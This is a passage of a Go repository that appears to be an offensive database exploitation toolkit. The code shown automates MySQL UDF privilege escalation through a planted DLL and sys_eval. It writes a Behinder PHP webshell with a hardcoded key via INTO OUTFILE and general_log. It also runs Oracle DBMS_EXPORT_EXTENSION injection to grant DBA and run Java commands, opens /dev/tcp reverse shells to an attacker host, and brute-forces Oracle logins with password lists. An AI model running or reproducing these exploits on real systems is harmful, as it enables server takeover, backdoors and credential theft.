101 | 		Info("拼接dll数据出错")
102 | 		os.Exit(1)
103 | 	}
104 | 	if v >= float64(5.1) {
105 | 		Info("导出dll")
106 | 		_, err := MysqlCMD(fmt.Sprintf("select * from %s.temp into dumpfile \"%s%s.dll\";", databasename, plugin_path, udfname), conn)
107 | 		if err != nil {
108 | 			Info("导出dll错误，可能不存在lib/plugin目录")
109 | 			Info("尝试通过utfs流创建lib/plugin目录")
110 | 			_, err := MysqlCMD(fmt.Sprintf("select '1' into dumpfile '%s::$INDEX_ALLOCATION'", plugin_path), conn)
111 | 			if err != nil {
112 | 				Info("通过ntfs流创建失败！")
113 | 				Info("导出dll失败！")
114 | 				Err(err)
115 | 				os.Exit(1)
116 | 			}
117 | 		}
118 | 		Info("创建sys_eval函数")
119 | 		_, err1 := MysqlCMD(fmt.Sprintf("create function sys_eval returns string soname '%s.dll';", udfname), conn)
120 | 		if err1 != nil {
121 | 			Info("创建动态链接库函数错误")
122 | 			Err(err1)
123 | 			os.Exit(1)
124 | 		}
125 | 		Info("执行whoami")
126 | 		whoamiresult, err2 := MysqlCMD(fmt.Sprintf("select sys_eval('whoami');"), conn)
127 | 		if err2 != nil {
128 | 			Info("执行命令出错！")
129 | 			Err(err2)
130 | 			os.Exit(1)
131 | 		}
132 | 		fmt.Println(whoamiresult[0]["sys_eval('whoami')"])
133 | 		MysqlCMDConsole(conn)
134 | 		DropSYSEVAL(conn)
135 | 
136 | 	} else if v < float64(5.1) && v >= float64(5.0) {
137 | 		Info("导出dll")
138 | 		_, err := MysqlCMD(fmt.Sprintf("select * from %s.temp into dumpfile \"C:\\\\Windows\\\\System32\\\\%s.dll\"", databasename, udfname), conn)
139 | 		if err != nil {
140 | 			Info("导出dll失败！")
141 | 			Err(err)
142 | 			os.Exit(1)
143 | 		}
144 | 		Info("创建sys_eval函数")
145 | 		_, err1 := MysqlCMD(fmt.Sprintf("create function sys_eval returns string soname '%s.dll';", udfname), conn)
146 | 		if err1 != nil {
147 | 			Info("创建动态链接库函数错误！")
148 | 			Err(err1)
149 | 			os.Exit(1)
150 | 		}
151 | 		Info("执行whoami命令")
152 | 		whoamiresult, err2 := MysqlCMD(fmt.Sprintf("select sys_eval('whoami');"), conn)
153 | 		if err2 != nil {
154 | 			Info("执行命令出错！")
155 | 			Err(err2)
156 | 			os.Exit(1)
157 | 		}
158 | 		fmt.Println(whoamiresult[0]["sys_eval('whoami')"])
159 | 		MysqlCMDConsole(conn)
160 | 		DropSYSEVAL(conn)
161 | 
162 | 	} else if v < float64(5.0) {
163 | 		_, err := MysqlCMD(fmt.Sprintf("select * from %s.temp into dumpfile \"C:\\Windows\\%s.dll\"", databasename, udfname), conn)
164 | 		if err != nil {
165 | 			Info("导出dll失败！")
166 | 			Err(err)
167 | 			os.Exit(1)
168 | 		}
169 | 		_, err1 := MysqlCMD(fmt.Sprintf("create function sys_eval returns string soname '%s.dll';", udfname), conn)
170 | 		if err1 != nil {
171 | 			Info("创建动态链接库函数错误！")
172 | 			Err(err1)
173 | 			os.Exit(1)
174 | 		}
175 | 		_, err2 := MysqlCMD(fmt.Sprintf("select sys_eval('whoami');"), conn)
176 | 		if err2 != nil {
177 | 			Info("执行命令出错！")
178 | 			Err(err2)
179 | 			os.Exit(1)
180 | 		}
181 | 
182 | 	} else {
183 | 		Info("处理版本格式错误！无法进行判断")
184 | 	}
185 | }
186 | 
187 | // 创建数据库、表
188 | func DataMethod(conn *sql.DB) (databasename string) {
189 | 	Info("创建数据库")
190 | 	databasename = RandStr(3)
191 | 	_, err1 := MysqlCMD(fmt.Sprintf("create database %s;", databasename), conn)
192 | 	if err1 != nil {
193 | 		Err(err1)
194 | 		Info("创建数据库出错！")
195 | 		//os.Exit(1)
196 | 	}
197 | 
198 | 	Info("创建temp表")
199 | 	_, err2 := MysqlCMD(fmt.Sprintf("create table %s.temp(data longblob);", databasename), conn)
200 | 	if err2 != nil {
201 | 		Err(err2)
202 | 		Info("创建temp表出错！")
203 | 		os.Exit(1)
204 | 	}
205 | 	Info("插入数据")
206 | 	_, err3 := MysqlCMD(fmt.Sprintf("insert into %s.temp values(\"\");", databasename), conn)
207 | 	if err3 != nil {
208 | 		Err(err3)
209 | 		Info("插入数据出错！")
210 | 		os.Exit(1)
211 | 	}
212 | 	return databasename
213 | }
214 | 
215 | // 系统判断完选择提权方式
216 | func UdfUdfPrivilegeDetail(conn *sql.DB, ostype string, plugin_path string) {
217 | 	udfname := RandStr(3)
218 | 	databasename := DataMethod(conn)
219 | 
220 | 	if ostype == "Win32" {
221 | 		Detail(conn, plugin_path, Win32dll, udfname, databasename)
222 | 	} else if ostype == "Win64" {
223 | 		Detail(conn, plugin_path, Win64dll, udfname, databasename)
224 | 	} else if ostype == "Linux64" {
225 | 		Detail(conn, plugin_path, Linux64dll, udfname, databasename)
226 | 	} else if ostype == "Linux32" {
227 | 		Detail(conn, plugin_path, Linux32dll, udfname, databasename)
228 | 	} else {
229 | 		Info("错误，无法识别的数据库类型")
230 | 	}
231 | }
232 | 
233 | // 通过系统判断
234 | func ChoiceDetail(conn *sql.DB, compile_version_string string, plugin_path string, versioncompilemachine_value string) {
235 | 	if strings.HasPrefix(compile_version_string, "Win") {
236 | 		parts := strings.Split(compile_version_string, "in")
237 | 		if fmt.Sprintf("%s", parts[1]) == "32" {
238 | 			UdfUdfPrivilegeDetail(conn, "Win32", plugin_path)
239 | 		} else if fmt.Sprintf("%s", parts[1]) == "64" {
240 | 			UdfUdfPrivilegeDetail(conn, "Win64", plugin_path)
241 | 		} else {
242 | 			Info("无法获取版本，只识别32和64位")
243 | 		}
244 | 	} else if strings.Contains(strings.ToLower(compile_version_string), "linux") && strings.Contains(strings.ToLower(compile_version_string), "64") {
245 | 		UdfUdfPrivilegeDetail(conn, "Linux64", plugin_path)
246 | 	} else if strings.Contains(strings.ToLower(compile_version_string), "linux") && strings.Contains(strings.ToLower(compile_version_string), "32") {
247 | 		UdfUdfPrivilegeDetail(conn, "Linux32", plugin_path)
248 | 	} else if strings.Contains(strings.ToLower(compile_version_string), "linux") && strings.Contains(strings.ToLower(versioncompilemachine_value), "64") {
249 | 		UdfUdfPrivilegeDetail(conn, "Linux64", plugin_path)
250 | 	} else if strings.Contains(strings.ToLower(compile_version_string), "linux") {
251 | 		UdfUdfPrivilegeDetail(conn, "Linux32", plugin_path)
252 | 	} else {
253 | 		Info("无法获取系统版本，只识别32和64")
254 | 	}
255 | 
256 | }
257 | 
258 | // 通过secure_file_priv判断
259 | func UdfPrivilege(conn *sql.DB) {
260 | 	// 获取secure_file_priv
261 | 	secure_file_priv, result := get_secure_file_priv(conn)
262 | 	if result == true {
263 | 		Info("存在secure_file_priv")
264 | 		if secure_file_priv == "NULL" {
265 | 			Info("secure_file_priv的值为NULL，不允许导入或导出")
266 | 		} else if secure_file_priv == "/" {
267 | 			Info("secure_file_priv的值为/，只允许在 / 目录导入导出")
268 | 		} else if len(fmt.Sprintf("%s", secure_file_priv)) == 0 {
269 | 			Info("secure_file_priv的值为空，不限制导入导出，可以尝试提权")
270 | 			// 获取Plugin路径
271 | 			plugin_path := get_plugin(conn)
272 | 
273 | 			// 获取主机版本架构
274 | 			compile_version_string, versioncompilemachine_value := get_compile(conn)
275 | 
276 | 			// 根据主机版本架构提权
277 | 			ChoiceDetail(conn, compile_version_string, plugin_path, versioncompilemachine_value)
278 | 
279 | 		} else {
280 | 			Info("secure_file_priv的值不为NULL、空和\\,请手动尝试！")
281 | 		}
282 | 	} else {
283 | 		Info("不存在secure_file_priv,尝试提权")
284 | 
285 | 		// 获取主机版本架构
286 | 		compile_version_string, versioncompilemachine_value := get_compile(conn)
287 | 
288 | 		// 获取Plugin路径
289 | 		plugin_path := get_plugin(conn)
290 | 
291 | 		// 根据主机版本架构提权
292 | 		ChoiceDetail(conn, compile_version_string, plugin_path, versioncompilemachine_value)
293 | 	}
294 | }
295 | 
296 | func DropSYSEVAL(conn *sql.DB) {
297 | 	Info("执行完毕，删除sys_eval函数")
298 | 	_, err := MysqlCMD("drop FUNCTION sys_eval;", conn)
299 | 	if err != nil {
300 | 		Err(err)
301 | 	}
302 | }
303 | 


--------------------------------------------------------------------------------
/pac/mysql_webshell.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"database/sql"
 5 | 	"fmt"
 6 | )
 7 | 
 8 | func Webshell_IntoOutFile(conn *sql.DB, path string) {
 9 | 	Info("\n1、知道网站物理路径\n2、高权限数据库用户\n3、load_file() 开启 即 secure_file_priv 无限制\n4、网站路径有写入权限")
10 | 	m, err := MysqlCMD("show global variables like '%secure_file_priv%';", conn)
11 | 	if err != nil {
12 | 		Err(err)
13 | 	}
14 | 	fmt.Printf("%v\n", m[0]["Value"])
15 | 	secure_file_priv := fmt.Sprintf("%v", m[0]["Value"])
16 | 	//fmt.Printf("%T", secure_file_priv)
17 | 	if secure_file_priv == "NULL" {
18 | 		Info("secure_file_priv的值为NULL，不允许导入或导出")
19 | 	} else if secure_file_priv == "/" {
20 | 		Info("secure_file_priv的值为/，只允许在 / 目录导入导出")
21 | 	} else if secure_file_priv == "" {
22 | 		Info("secure_file_priv的值为空，不限制导入导出,尝试写webshell,默认写冰蝎3.0php,默认密钥")
23 | 		a := fmt.Sprintf("select '<?php @error_reporting(0);session_start();$key=\"e45e329feb5d925b\";$_SESSION[\"k\"]=$key;session_write_close();$post=file_get_contents(\"php://input\");if(!extension_loaded(\"openssl\")){$t=\"base64_\".\"decode\";$post=$t($post.\"\");for($i=0;$i<strlen($post);$i++) {$post[$i]=$post[$i]^$key[$i+1&15];}}else{$post=openssl_decrypt($post, \"AES128\", $key);}$arr=explode(\"|\",$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p.\"\");}}@call_user_func(new C(),$params);?>' into outfile '%s'", path)
24 | 		Info(a)
25 | 		MysqlCMD(a, conn)
26 | 	} else {
27 | 		Info("secure_file_priv的值不为NULL,/和空，请手动尝试！")
28 | 	}
29 | }
30 | 
31 | func Webshell_logshell(conn *sql.DB, path string) {
32 | 	Info("\n1、数据库为 root 权限\n2、Web 目录可写\n3、知道 Web 的物理绝对路径")
33 | 	m, err := MysqlCMD("SHOW VARIABLES LIKE '%general%';", conn)
34 | 	if err != nil {
35 | 		Err(err)
36 | 	}
37 | 	fmt.Printf("%v\n", m[0]["Value"])
38 | 	fmt.Sprintf("%v\n", m[0][""])
39 | 	Info("执行set global general_log = \"ON\";开启general_log")
40 | 	MysqlCMD("set global general_log = \"ON\";", conn)
41 | 	// set global general_log_file='c:/phpstudy_pro/www/shell.php';
42 | 	a := fmt.Sprintf("set global general_log_file='%s';", path)
43 | 	Info("执行set global general_log_file='c:/phpstudy_pro/www/shell.php';修改general_log_file路径")
44 | 	MysqlCMD(a, conn)
45 | 	Info("尝试写入webshell")
46 | 	b := fmt.Sprintf("select '<?php @error_reporting(0);session_start();$key=\"e45e329feb5d925b\";$_SESSION[\"k\"]=$key;session_write_close();$post=file_get_contents(\"php://input\");if(!extension_loaded(\"openssl\")){$t=\"base64_\".\"decode\";$post=$t($post.\"\");for($i=0;$i<strlen($post);$i++) {$post[$i]=$post[$i]^$key[$i+1&15];}}else{$post=openssl_decrypt($post, \"AES128\", $key);}$arr=explode(\"|\",$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p.\"\");}}@call_user_func(new C(),$params);?>'")
47 | 	MysqlCMD(b, conn)
48 | 	Success("执行完成，请尝试连接webshell，默认3.0冰蝎，默认密钥")
49 | 
50 | }
51 | 


--------------------------------------------------------------------------------
/pac/oracl_xmlquery.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"database/sql"
 6 | 	"fmt"
 7 | 	"os"
 8 | 	"strings"
 9 | )
10 | 
11 | func OracleXMLQuery(conn *sql.DB) {
12 | 
13 | 	_, err := OracleCMD(fmt.Sprintf("select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str +=stemp+\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual"), conn)
14 | 	if err != nil {
15 | 		Err(err)
16 | 	}
17 | 
18 | 	_, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''YY'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''');end;'''';END;'';END;--','SYS',0,'1',0) from dual"), conn)
19 | 	if err != nil {
20 | 		Err(err)
21 | 	}
22 | 
23 | 	_, err = OracleCMD(fmt.Sprintf("select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual"), conn)
24 | 	if err != nil {
25 | 		Err(err)
26 | 	}
27 | 
28 | 	_, err = OracleCMD(fmt.Sprintf("select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'"), conn)
29 | 	if err != nil {
30 | 		Err(err)
31 | 	}
32 | }
33 | 
34 | func OracleXMLQueryConsole(conn *sql.DB) {
35 | 	Info("执行系统命令")
36 | 	OracleXMLQuery(conn)
37 | 	reader := bufio.NewReader(os.Stdin)
38 | 	for {
39 | 		var cmd string
40 | 		fmt.Printf("%s:%s> $ ", Rhost, Rport)
41 | 		cmd, _ = reader.ReadString('\n')
42 | 		cmd = strings.TrimRight(cmd, "\r\n")
43 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
44 | 			break
45 | 		}
46 | 		resultSet, err := OracleCMD(fmt.Sprintf("select LinxRunCMD('/bin/bash -c /usr/bin/%s') from dual", cmd), conn)
47 | 		for _, m := range resultSet {
48 | 			for _, value := range m {
49 | 				fmt.Println(fmt.Sprintf("%s", value))
50 | 			}
51 | 		}
52 | 		if err != nil {
53 | 			Err(err)
54 | 		}
55 | 	}
56 | }
57 | 
58 | func OracleXMLQueryCMD(cmd string, conn *sql.DB) {
59 | 	Info("执行系统命令")
60 | 	OracleXMLQuery(conn)
61 | 	resultSet, err := OracleCMD(fmt.Sprintf("select LinxRunCMD('/bin/bash -c /usr/bin/%s') from dual", cmd), conn)
62 | 	for _, m := range resultSet {
63 | 		for _, value := range m {
64 | 			fmt.Println(fmt.Sprintf("%s", value))
65 | 		}
66 | 	}
67 | 	if err != nil {
68 | 		Err(err)
69 | 	}
70 | }
71 | 
72 | func DropFucnction(conn *sql.DB) {
73 | 	Info("卸载命令执行函数")
74 | 	_, err := OracleCMD(fmt.Sprintf("drop function LinxRunCMD"), conn)
75 | 	if err != nil {
76 | 		Err(err)
77 | 	}
78 | 	Success("卸载成功")
79 | }
80 | 


--------------------------------------------------------------------------------
/pac/oracle_cmd.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"context"
 6 | 	"database/sql"
 7 | 	"fmt"
 8 | 	"log"
 9 | 	"os"
10 | 	"strings"
11 | )
12 | 
13 | func OracleCMD(sqlstr string, conn *sql.DB) ([]map[string]interface{}, error) {
14 | 	rows, err := conn.QueryContext(context.Background(), fmt.Sprintf("%s", sqlstr))
15 | 	if err != nil {
16 | 		Err(err)
17 | 		return nil, nil
18 | 	}
19 | 	defer rows.Close()
20 | 	cols, err := rows.Columns()
21 | 	if err != nil {
22 | 		Err(err)
23 | 	}
24 | 	resultSet := make([]map[string]interface{}, 0)
25 | 	for rows.Next() {
26 | 		row := make([]interface{}, len(cols))
27 | 		rowPtrs := make([]interface{}, len(cols))
28 | 		for i := range row {
29 | 			rowPtrs[i] = &row[i]
30 | 		}
31 | 		if err := rows.Scan(rowPtrs...); err != nil {
32 | 			log.Fatal(err)
33 | 		}
34 | 		entry := make(map[string]interface{})
35 | 		for i, colName := range cols {
36 | 			val := row[i]
37 | 			b, ok := val.([]byte)
38 | 			if ok {
39 | 				entry[colName] = string(b)
40 | 			} else {
41 | 				entry[colName] = val
42 | 			}
43 | 		}
44 | 		resultSet = append(resultSet, entry)
45 | 	}
46 | 	return resultSet, err
47 | }
48 | 
49 | // 循环执行sql语句
50 | func loopOracleCMD(conn *sql.DB) {
51 | 	Info("执行Oracle SQL命令")
52 | 	reader := bufio.NewReader(os.Stdin)
53 | 	for {
54 | 		fmt.Printf("%s:%s> ", Rhost, Rport)
55 | 		cmd, _ := reader.ReadString('\n')
56 | 		cmd = strings.TrimRight(cmd, "\r\n")
57 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
58 | 			break
59 | 		}
60 | 		resultSet, err := OracleCMD(cmd, conn)
61 | 		for _, m := range resultSet {
62 | 			for _, value := range m {
63 | 				fmt.Println(value)
64 | 			}
65 | 		}
66 | 
67 | 		if err != nil {
68 | 			Info("循环执行sql语句报错")
69 | 		}
70 | 	}
71 | }
72 | 


--------------------------------------------------------------------------------
/pac/oracle_connect.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"database/sql"
 5 | 	"fmt"
 6 | 	_ "github.com/godror/godror"
 7 | 	"os"
 8 | 	"strings"
 9 | )
10 | 
11 | func OracleConnect(ruser string, pwd string, rhost string, rport string, sid string) (conn *sql.DB, err error, sign bool) {
12 | 	conn, err = sql.Open("godror", fmt.Sprintf(`user=%s password="%s" connectString="%s:%s/%s"`, ruser, pwd, rhost, rport, sid))
13 | 	if err != nil {
14 | 		Err(err)
15 | 		return nil, nil, false
16 | 	}
17 | 	err = conn.Ping()
18 | 	if err != nil {
19 | 		Err(err)
20 | 		return nil, nil, false
21 | 	}
22 | 	Info("Oracle数据库连接成功")
23 | 	if err != nil {
24 | 		Err(err)
25 | 		return nil, nil, false
26 | 	}
27 | 	sign = true
28 | 	return conn, nil, sign
29 | }
30 | 
31 | func OracleCrack(Rhost string, Rport string) {
32 | 	Info("开始爆破,请稍等.....")
33 | 	sign = false
34 | 	for _, user := range Userdict["oracle"] {
35 | 		for _, pass := range Passwords {
36 | 			pass = strings.Replace(pass, "{user}", user, -1)
37 | 			_, _, sign := OracleConnect(user, pass, Rhost, Rport, "orcl")
38 | 			if sign == true {
39 | 				Success(fmt.Sprintf("账号密码为：%s:%s", user, pass))
40 | 				os.Exit(0)
41 | 			} else {
42 | 				fmt.Println(fmt.Sprintf("%s:%s 未成功爆破出账号密码", user, pass))
43 | 			}
44 | 		}
45 | 	}
46 | }
47 | 


--------------------------------------------------------------------------------
/pac/oracle_export_extension.go:
--------------------------------------------------------------------------------
  1 | package pac
  2 | 
  3 | import (
  4 | 	"bufio"
  5 | 	"database/sql"
  6 | 	"fmt"
  7 | 	"os"
  8 | 	"strings"
  9 | )
 10 | 
 11 | // GET_DOMAIN_INDEX_TABLES注入
 12 | func OracleExportExtension(conn *sql.DB) {
 13 | 
 14 | 	_, err := OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0) from dual"), conn)
 15 | 	if err != nil {
 16 | 		Err(err)
 17 | 	}
 18 | 
 19 | 	_, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args){try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str +=stemp+\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str +=stemp+\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual\n"), conn)
 20 | 	if err != nil {
 21 | 		Err(err)
 22 | 	}
 23 | 
 24 | 	_, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''<>'''''''', ''''''''execute'''''''');end;'''';END;'';END;--','SYS',0,'1',0) from dual"), conn)
 25 | 	if err != nil {
 26 | 		Err(err)
 27 | 	}
 28 | 
 29 | 	_, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual\n"), conn)
 30 | 	if err != nil {
 31 | 		Err(err)
 32 | 	}
 33 | 
 34 | 	_, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual\n"), conn)
 35 | 	if err != nil {
 36 | 		Err(err)
 37 | 	}
 38 | }
 39 | 
 40 | func OracleExportExtensionConsole(conn *sql.DB) {
 41 | 
 42 | 	Info("执行系统命令")
 43 | 	OracleExportExtension(conn)
 44 | 	reader := bufio.NewReader(os.Stdin)
 45 | 	for {
 46 | 		var cmd string
 47 | 		fmt.Printf("%s:%s> $ ", Rhost, Rport)
 48 | 		cmd, _ = reader.ReadString('\n')
 49 | 		cmd = strings.TrimRight(cmd, "\r\n")
 50 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
 51 | 			break
 52 | 		}
 53 | 		resultSet, err := OracleCMD(fmt.Sprintf("select sys.LinxRunCMD('/bin/bash -c /usr/bin/%s') from dual", cmd), conn)
 54 | 		for _, m := range resultSet {
 55 | 			for _, value := range m {
 56 | 				fmt.Println(fmt.Sprintf("%s", value))
 57 | 			}
 58 | 		}
 59 | 		if err != nil {
 60 | 			Err(err)
 61 | 		}
 62 | 	}
 63 | }
 64 | 
 65 | func OracleExportExtensionCMD(cmd string, conn *sql.DB) {
 66 | 	Info("执行系统命令")
 67 | 	OracleExportExtension(conn)
 68 | 	resultSet, err := OracleCMD(fmt.Sprintf("select sys.LinxRunCMD('/bin/bash -c /usr/bin/%s') from dual", cmd), conn)
 69 | 	for _, m := range resultSet {
 70 | 		for _, value := range m {
 71 | 			fmt.Println(fmt.Sprintf("%s", value))
 72 | 		}
 73 | 	}
 74 | 	if err != nil {
 75 | 		Err(err)
 76 | 	}
 77 | }
 78 | 
 79 | // 利用DBMS_EXPORT_EXTENSION注入漏洞反弹shell
 80 | func OracleExportExtensionReverse(conn *sql.DB, Lhost string, Lport string) {
 81 | 
 82 | 	_, err := OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"shell\" as import java.io.*;import java.net.*;public class shell {public static void run() throws Exception{String[] aaa={\"/bin/bash\",\"-c\",\"exec 9<> /dev/tcp/%s/%s;exec 0<&9;exec 1>&9 2>&1;/bin/sh\"};Process p=Runtime.getRuntime().exec(aaa);}}'''';END;'';END;--','SYS',0,'1',0) from dual", Lhost, Lport), conn)
 83 | 	if err != nil {
 84 | 		Err(err)
 85 | 	}
 86 | 
 87 | 	_, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''<>'''''''', ''''''''*'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual"), conn)
 88 | 	if err != nil {
 89 | 		Err(err)
 90 | 	}
 91 | 
 92 | 	_, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual"), conn)
 93 | 	if err != nil {
 94 | 		Err(err)
 95 | 	}
 96 | 
 97 | 	_, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual"), conn)
 98 | 	if err != nil {
 99 | 		Err(err)
100 | 	}
101 | 
102 | 	_, err = OracleCMD(fmt.Sprintf("select sys.reversetcp from dual"), conn)
103 | 	if err != nil {
104 | 		Err(err)
105 | 	}
106 | 
107 | }
108 | 


--------------------------------------------------------------------------------
/pac/oracle_funcall.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"database/sql"
 5 | 	"fmt"
 6 | )
 7 | 
 8 | func OracleFuncCallReverse(conn *sql.DB, Lhost string, Lport string) {
 9 | 	Info("通过dbms_java_test.funcall()反弹shell")
10 | 	_, err := OracleCMD(fmt.Sprintf("Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','exec 9<> /dev/tcp/%s/%s;exec 0<&9;exec 1>&9 2>&1;/bin/bash') from dual ", Lhost, Lport), conn)
11 | 	if err != nil {
12 | 		Err(err)
13 | 	}
14 | 	Info("请查看是否收到shell")
15 | }
16 | 


--------------------------------------------------------------------------------
/pac/other.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"database/sql"
 5 | 	"fmt"
 6 | 	"math/rand"
 7 | 	"time"
 8 | )
 9 | 
10 | var Userdict = map[string][]string{
11 | 	"mysql":      {"root", "mysql"},
12 | 	"mssql":      {"sa", "sql"},
13 | 	"postgresql": {"postgres", "admin"},
14 | 	"oracle":     {"system", "sys", "admin", "test", "web", "orcl"},
15 | 	"redis":      {"redis"},
16 | }
17 | 
18 | var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "{user}@123#4", "P@ssw0rd!", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "123456!a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "1qaz!QAZ", "2wsx@WSX", "qwe123!@#", "Aa123456!", "A123456s!", "sa123456", "1q2w3e", "Charge123", "Aa123456789", "postgres"}
19 | 
20 | // 产生随机字符
21 | func RandStr(length int) string {
22 | 	str := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
23 | 	bytes := []byte(str)
24 | 	result := []byte{}
25 | 	rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100)))
26 | 	for i := 0; i < length; i++ {
27 | 		result = append(result, bytes[rand.Intn(len(bytes))])
28 | 	}
29 | 	return string(result)
30 | }
31 | 
32 | func RandStrnum(length int) string {
33 | 	str := "1234567890"
34 | 	bytes := []byte(str)
35 | 	result := []byte{}
36 | 	rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100)))
